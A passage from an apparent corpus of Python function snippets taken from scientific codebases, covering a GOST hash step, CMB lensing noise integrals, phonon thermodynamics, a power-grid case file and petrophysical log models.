\"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. 
Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_post_nveto_pmts(self):\n pass", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def prove_N() -> Proof:\n # Optional Task 6.8", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n 
yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = 
np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 
250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def E_Dynamic_MavkoEtAl2009(rhob,DTS,PR):\n E = (2*(rhob*1000)*((304800/DTS)**2)*(1+PR))/1000000\n return E", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif 
MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. 
Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def TDErrorFunction(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0,lam=[0,0,0,0,0,0]):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, 